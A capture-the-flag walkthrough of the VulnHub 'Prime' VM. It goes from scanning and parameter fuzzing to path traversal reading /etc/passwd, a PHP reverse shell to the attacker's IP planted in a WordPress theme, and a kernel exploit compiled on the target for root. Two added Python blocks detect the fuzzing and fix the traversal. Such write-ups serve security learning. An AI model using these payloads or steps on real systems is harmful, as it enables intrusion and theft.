Prime

Download: https://www.vulnhub.com/entry/prime-1,358/

WordPress theme file directory layout: https://www.php.cn/cms/wordpress/426781.html

openssl:

https://linuxconfig.org/using-openssl-to-encrypt-messages-and-files-on-linux

https://www.digicert.com/kb/ssl-support/openssl-quick-reference-guide.htm

1. Host discovery

┌──(de1te㉿de1te)-[~]
└─$ sudo nmap -sn 192.168.239.0/24                                                                                                                                                                               
[sudo] de1te 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:21 CST
Nmap scan report for 192.168.239.1
Host is up (0.00068s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:CE:9B:03 (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:E5:9F:A6 (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 19.00 seconds
  • The target host is 192.168.239.134

2. Nmap scan and analysis

  1. Open-port scan

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap --min-rate 10000 -p- 192.168.239.134      
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:22 CST
    Nmap scan report for 192.168.239.134
    Host is up (0.000071s latency).
    Not shown: 65533 closed tcp ports (reset)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:CE:9B:03 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 10.83 seconds
    
    
    • Ports 22 and 80 are open; in a real engagement, scan twice so a transient network problem doesn't skew the result
    • Priority: look at 80 first, then 22
  2. Service version scan of the open ports

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap -sT -sV -O -p 22,80 192.168.239.134          
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:24 CST
    Nmap scan report for 192.168.239.134
    Host is up (0.00032s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    MAC Address: 00:0C:29:CE:9B:03 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 17.26 seconds
    

    UDP scan

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap -sU -p 22,80 192.168.239.134
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:26 CST
    Nmap scan report for 192.168.239.134
    Host is up (0.00031s latency).
    
    PORT   STATE  SERVICE
    22/udp closed ssh
    80/udp closed http
    MAC Address: 00:0C:29:CE:9B:03 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 8.68 seconds
    

    Both 22 and 80 show as closed over UDP

  3. Common vulnerability scan

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap --script=vuln -p22,80 192.168.239.134 
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:32 CST
    Stats: 0:01:48 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 98.52% done; ETC: 10:34 (0:00:01 remaining)
    Nmap scan report for 192.168.239.134
    Host is up (0.00036s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_      http://ha.ckers.org/slowloris/
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |   /wordpress/: Blog
    |_  /wordpress/wp-login.php: Wordpress login page.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    MAC Address: 00:0C:29:CE:9B:03 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 329.75 seconds
    
    
    • The first finding is a DoS issue, which is of no use for the penetration test
    • The second shows the site is running the WordPress CMS, which is worth noting!!!

Looking at the web page on port 80:

Just a single image, hmm

Its HTML source

<html>
<title>HacknPentest</title>
<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>

</html>

3. Directory brute-forcing and fuzzing

  1. Directory scan

    Common directory brute-force tools: dirb, gobuster, feroxbuster

    When using a directory brute-force tool, pay more attention to how you set its parameters than to which tool it is

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo dirb http://192.168.239.134 
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Fri Mar 31 10:44:48 2023
    URL_BASE: http://192.168.239.134/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.239.134/ ----
    + http://192.168.239.134/dev (CODE:200|SIZE:131)                                                                                                                                                                 
    + http://192.168.239.134/index.php (CODE:200|SIZE:136)                                                                                                                                                           
    ==> DIRECTORY: http://192.168.239.134/javascript/                                                                                                                                                                
    + http://192.168.239.134/server-status (CODE:403|SIZE:303)                                                                                                                                                       
    ==> DIRECTORY: http://192.168.239.134/wordpress/                                                                                                                                                                 
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/javascript/ ----
    ==> DIRECTORY: http://192.168.239.134/javascript/jquery/                                                                                                                                                         
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/ ----
    + http://192.168.239.134/wordpress/index.php (CODE:301|SIZE:0)                                                                                                                                                   
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/                                                                                                                                                        
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-content/                                                                                                                                                      
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-includes/                                                                                                                                                     
    + http://192.168.239.134/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                                                 
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/javascript/jquery/ ----
    + http://192.168.239.134/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                                                                                                         
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/ ----
    + http://192.168.239.134/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                          
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/css/                                                                                                                                                    
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/images/                                                                                                                                                 
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/includes/                                                                                                                                               
    + http://192.168.239.134/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                          
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/js/                                                                                                                                                     
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/maint/                                                                                                                                                  
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/network/                                                                                                                                                
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/user/                                                                                                                                                   
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-content/ ----
    + http://192.168.239.134/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                        
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-content/plugins/                                                                                                                                              
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-content/themes/                                                                                                                                               
    ==> DIRECTORY: http://192.168.239.134/wordpress/wp-content/uploads/                                                                                                                                              
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-includes/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/css/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/images/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/includes/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/js/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/maint/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/network/ ----
    + http://192.168.239.134/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                                                  
    + http://192.168.239.134/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                                                  
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/user/ ----
    + http://192.168.239.134/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                                                     
    + http://192.168.239.134/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                                                     
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-content/plugins/ ----
    + http://192.168.239.134/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                                                
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-content/themes/ ----
    + http://192.168.239.134/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                                                 
                                                                                                                                                                                                                     
    ---- Entering directory: http://192.168.239.134/wordpress/wp-content/uploads/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                   
    -----------------
    END_TIME: Fri Mar 31 10:45:19 2023
    DOWNLOADED: 46120 - FOUND: 15
    

    From the above, dev is worth a look, and the site runs the WordPress CMS

  2. Look at the dev page

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo curl http://192.168.239.134/dev  
    hello,
    
    now you are at level 0 stage.
    
    In real life pentesting we should use our tools to dig on a web very hard.
    
    Happy hacking. 
    

    Hmm, it tells us to dig harder on the web, which sounds like deeper directory enumeration. Let's try specifying file extensions

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo dirb http://192.168.239.134 -X .zip,.txt 
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Fri Mar 31 10:51:40 2023
    URL_BASE: http://192.168.239.134/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.239.134/ ----
    + http://192.168.239.134/secret.txt (CODE:200|SIZE:412)                                                             
                                                                                                                        
    -----------------
    END_TIME: Fri Mar 31 10:51:46 2023
    DOWNLOADED: 9224 - FOUND: 1                              
    

    Found a secret.txt; let's read it

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo curl http://192.168.239.134/secret.txt
    [sudo] de1te 的密码:
    Looks like you have got some secrets.
    
    Ok I just want to do some help to you. 
    
    Do some more fuzz on every page of php which was finded by you. And if
    you get any right parameter then follow the below steps. If you still stuck 
    Learn from here a basic tool with good usage for OSCP.
    
    https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
     
    
    
    //see the location.txt and you will get your next move//
    

    It tells us to fuzz every PHP page and then look at location.txt

    # First find all the php files
    ┌──(de1te㉿de1te)-[~]
    └─$ sudo dirb http://192.168.239.134 -X .php      
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Fri Mar 31 10:59:53 2023
    URL_BASE: http://192.168.239.134/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.239.134/ ----
    + http://192.168.239.134/image.php (CODE:200|SIZE:147)                                                 
    + http://192.168.239.134/index.php (CODE:200|SIZE:136)                                                 
                                                                                                           
    -----------------
    END_TIME: Fri Mar 31 10:59:56 2023
    DOWNLOADED: 4612 - FOUND: 2
    

    Two pages: index and image

    index

    ┌──(de1te㉿de1te)-[~]
    └─$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hw 12  http://192.168.239.134/index.php?FUZZ=something
     /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    
    Target: http://192.168.239.134/index.php?FUZZ=something
    Total requests: 951
    
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload                                                                                                                                          
    =====================================================================
    
    000000341:   200        7 L      19 W       206 Ch      "file"                                                                                                                                           
    
    Total time: 0.977494
    Processed Requests: 951
    Filtered Requests: 950
    Requests/sec.: 972.8950
    

    Hmm, index.php responds to a `file` parameter.

    Let's test it

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo curl http://192.168.239.134?file=location.txt
    <html>
    <title>HacknPentest</title>
    <body>
     <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
    </body>
    
    Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
    </html>
    
    

    It tells us to try the secrettier360 parameter on another page

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo curl http://192.168.239.134/image.php?secrettier360=location.txt
    <html>
    <title>HacknPentest</title>
    <body>
     <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
    </body>
    finaly you got the right parameter<br><br><br><br></html>
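
The dirb, wfuzz and parameter-probing requests above all leave a distinctive trace in the web server's access log. The following Python script is an added example, not part of the original writeup or of the Prime VM, that triages Apache combined-format log lines for those three patterns (bursts of 404s from one client, many distinct query parameter names against one script, and dot-dot traversal sequences). The log lines, client IPs, thresholds and word lists in it are constructed for the example.

```python
"""Triage an Apache combined-format access log for directory brute-forcing,
parameter fuzzing and path-traversal payloads.

Added example: every log line, IP address and threshold below is constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format; referer and user-agent are optional so "common" format parses too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Matched against the request target after URL-decoding it twice, so single and
# double percent-encoding of '..' are both caught.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|%2e%2e)', re.IGNORECASE)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def triage(lines, notfound_threshold=20, param_threshold=10):
    """Return {client_ip: [finding, ...]} for clients that look like scanners."""
    notfound = defaultdict(int)        # ip -> number of 404 responses
    params = defaultdict(set)          # (ip, path) -> distinct query parameter names
    traversal = defaultdict(list)      # ip -> request targets containing '../'
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        parts = urlsplit(rec["target"])
        if rec["status"] == 404:
            notfound[ip] += 1
        for name in parse_qs(parts.query, keep_blank_values=True):
            params[(ip, parts.path)].add(name)
        if TRAVERSAL_RE.search(unquote(unquote(rec["target"]))):
            traversal[ip].append(rec["target"])

    findings = defaultdict(list)
    for ip, n in notfound.items():
        if n >= notfound_threshold:
            findings[ip].append(f"directory brute-force: {n} x 404")
    for (ip, path), names in params.items():
        if len(names) >= param_threshold:
            findings[ip].append(f"parameter fuzzing on {path}: {len(names)} distinct names")
    for ip, targets in traversal.items():
        findings[ip].append(f"path traversal: {len(targets)} request(s), e.g. {targets[0]}")
    return dict(findings)


def _line(ip, target, status, size):
    """Build one constructed combined-format log line."""
    return (f'{ip} - - [31/Mar/2023:10:44:48 +0800] "GET {target} HTTP/1.1" '
            f'{status} {size} "-" "Mozilla/5.0"')


# Constructed sample log: a dirb-style client, a wfuzz-style client, one traversal
# attempt and one ordinary visitor.
SAMPLE_LOG = (
    [_line("10.0.0.5", f"/{w}", 404, 303) for w in
     ["admin", "backup", "cgi-bin", "config", "db", "images", "login", "old",
      "private", "secret", "test", "tmp", "uploads", "users", "vendor", "www",
      "xml", "zip", "api", "data", "logs", "static"]]
    + [_line("10.0.0.6", f"/index.php?{p}=something", 200, 136) for p in
       ["file", "id", "page", "path", "q", "search", "src", "url", "view", "dir", "name"]]
    + [_line("10.0.0.7", "/image.php?secrettier360=../../../../etc/passwd", 200, 1850)]
    + [_line("10.0.0.8", "/wordpress/", 200, 4120)]
)

if __name__ == "__main__":
    for ip, notes in triage(SAMPLE_LOG).items():
        for note in notes:
            print(f"{ip}: {note}")
```

The thresholds are deliberately low so the constructed sample trips them; on a real server tune them per site, and note that the traversal check looks at the decoded target, so it also catches the `%2e%2e%2f` form that a single-pass filter would miss.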
    

3. File inclusion

It says we finally have the right parameter; this smells like file inclusion

┌──(de1te㉿de1te)-[~]
└─$ sudo curl http://192.168.239.134/image.php?secrettier360=../../../.../../etc/passwd                                                                                                                          
<html>
<title>HacknPentest</title>
<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>
  • In passwd, victor, saket and root are the three accounts worth noting

  • saket's entry says

    find password.txt file in my directory:/home/saket:
    

    Let's try that

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo curl http://192.168.239.134/image.php?secrettier360=../../../../../home/saket/password.txt 
    <html>
    <title>HacknPentest</title>
    <body>
     <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
    </body>
    finaly you got the right parameter<br><br><br><br>follow_the_ippsec
    </html>         
    

    We got the password follow_the_ippsec, but don't yet know where it is used
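
The secrettier360 parameter above hands a user-supplied path straight to the file system, which is why a chain of `../` escapes the web root and even the odd `.../` component in the payload is simply collapsed. The following Python code is an added example, not code from the original writeup or from the Prime VM's image.php, that puts a naive resolver next to a hardened one and runs both against request values modelled on the ones seen above. The base directory, file name and request list are constructed assumptions.

```python
"""Naive versus hardened resolution of a user-controlled include path.

Added example: the base directory, file names and request list below are
constructed; nothing here is taken from the Prime VM's image.php."""
import os
import tempfile

# Requests constructed to mirror the kinds of values seen in the writeup.
SAMPLE_REQUESTS = [
    "location.txt",                    # legitimate file inside the web root
    "sub/../location.txt",             # harmless dot-dot that stays inside
    "../../../.../../etc/passwd",      # traversal payload with a stray '...' component
    "/etc/passwd",                     # absolute path: os.path.join discards the base
    "..%2F..%2Fetc%2Fpasswd",          # still URL-encoded: a literal file name, not a path
    "location.txt\x00.png",            # NUL byte: classic extension-check bypass
]


def naive_resolve(base_dir, requested):
    """The vulnerable pattern: join and open, trusting the request."""
    return os.path.join(base_dir, requested)


def safe_resolve(base_dir, requested):
    """Return the real path to serve, or None if the request must be refused."""
    if not requested or "\x00" in requested:
        return None
    root = os.path.realpath(base_dir)
    # realpath collapses '..' (including odd components such as '...') and
    # follows symlinks, so the containment check sees the path actually opened.
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        return None                      # escaped the allowed directory
    if not os.path.isfile(candidate):
        return None                      # directories, devices, missing files
    return candidate


def run_checks(requests=SAMPLE_REQUESTS):
    """Create a throwaway web root holding one legitimate file and report what
    each resolver would hand to open() for every request."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        root = os.path.realpath(base)
        with open(os.path.join(root, "location.txt"), "w", encoding="utf-8") as fh:
            fh.write("constructed sample content\n")
        for req in requests:
            safe = safe_resolve(root, req)
            results[req] = {
                "naive": naive_resolve(root, req),
                "safe": None if safe is None else os.path.relpath(safe, root),
            }
    return results


if __name__ == "__main__":
    for req, outcome in run_checks().items():
        print(f"{req!r:40} naive -> {outcome['naive']}")
        print(f"{'':40} safe  -> {outcome['safe']}")
```

The hardened version relies on three checks that belong together: resolving with realpath before comparing (so symlinks and `..` are already collapsed), comparing with commonpath rather than a string prefix (so a sibling directory such as `wwwroot2` is not mistaken for `wwwroot`), and refusing anything that is not a regular file. An allow-list of permitted file names would be stricter still for a page that only ever serves one or two files.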

It might be the SSH password, but testing showed it isn't.

Hmm, we found the WordPress CMS during directory brute-forcing. Could it be the WordPress admin password? Let's try.

Since passwd listed three users, I simply tried them and found one that works.

Normally we would use a CMS scanner to enumerate the usernames.

Demonstration:

sudo wpscan --url http://192.168.239.134/wordpress -e u
[i] User(s) Identified:

[+] victor
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Mar 31 11:32:41 2023
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 17.017 KB
[+] Data Received: 20.176 MB
[+] Memory used: 166.508 MB
[+] Elapsed time: 00:00:04

Success: the credentials log in to the WordPress admin panel (screenshot omitted).

Common ways to abuse the WordPress admin panel

  1. Plugins: check whether a custom plugin can be uploaded

  2. Theme: check whether theme files can be edited and a new file added

  • Trying the plugin route:

    ┌──(de1te㉿de1te)-[~]
    └─$ zip shell hash
      adding: hash (deflated 15%)
    

    Upload the plugin

    The page shows

    Unable to create directory wp-content/uploads/2023/03. Is its parent directory writable by the server?
    

    So the first route is a dead end

  • Theme

    PHP reverse shell

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.239.129/443 0>&1'");?>
    

    Request the file

    http://192.168.239.134/wordpress/wp-content/themes/twentynineteen/secret.php
    

    Briefly, the theme path is

    wordpress/wp-content/themes/<current theme>/<file to request>
    
    www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ 
    

    Got a shell

4. Privilege escalation

  1. Easy wins: shadow, cron jobs, kernel exploits

    Checked: neither shadow nor crontab is usable,
    but the kernel version is old:
    Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    so try a kernel exploit

  2. Search with searchsploit

    ┌──(de1te㉿de1te)-[~]
    └─$ searchsploit Linux ubuntu 4.10.0-28                    
    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                                                                                                                                            |  Path
    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                                                                                                      | linux/dos/43234.c
    Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                                                                                             | linux/local/45010.c
    Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                                                                                                                    | linux/local/41760.txt
    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    
    

    The first one doesn't apply; download the second

    searchsploit -m 45010
    cat 45010.c # read the exploit source
    # usage noted in the source: gcc cve-2017-16995.c -o cve-2017-16995, then run the binary
    

    Compile it locally first, then start a simple HTTP server

    sudo php -S 0:80 # serve the current directory over HTTP on port 80
    
    wget http://192.168.239.129/45010.c # fetch the exploit source
    wget http://192.168.239.129/45010 # fetch the locally compiled binary
    ls -lsah # check permissions
    789612  24K -rw-r--r-- 1 www-data www-data  22K Mar 30 22:58 45010
    790522  16K -rw-r--r-- 1 www-data www-data  13K Mar 30 22:58 45010.c
    # not executable
    chmod +x 45010 # add execute permission
    ./45010 # run it
    ./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./45010) 
    # the attacker-side glibc is newer than the target's, so compile on the target instead
    gcc 45010.c -o 45010-2
    ./45010-2
    # got root
    whoami
    root
    ip a
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
           valid_lft forever preferred_lft forever
        inet6 ::1/128 scope host 
           valid_lft forever preferred_lft forever
    2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
        link/ether 00:0c:29:ce:9b:03 brd ff:ff:ff:ff:ff:ff
        inet 192.168.239.134/24 brd 192.168.239.255 scope global dynamic ens33
           valid_lft 1637sec preferred_lft 1637sec
        inet6 fe80::187c:d5b0:3aa1:fcb9/64 scope link 
           valid_lft forever preferred_lft forever
    

    Privilege escalation succeeded!!!

    Proof:

    root@ubuntu:/root# cat root.txt
    cat root.txt
    b2b17036da1de94cfb024540a8e7075a
    root@ubuntu:/root# whoami
    whoami
    root
    root@ubuntu:/root# ip a
    ip a
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
           valid_lft forever preferred_lft forever
        inet6 ::1/128 scope host 
           valid_lft forever preferred_lft forever
    2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
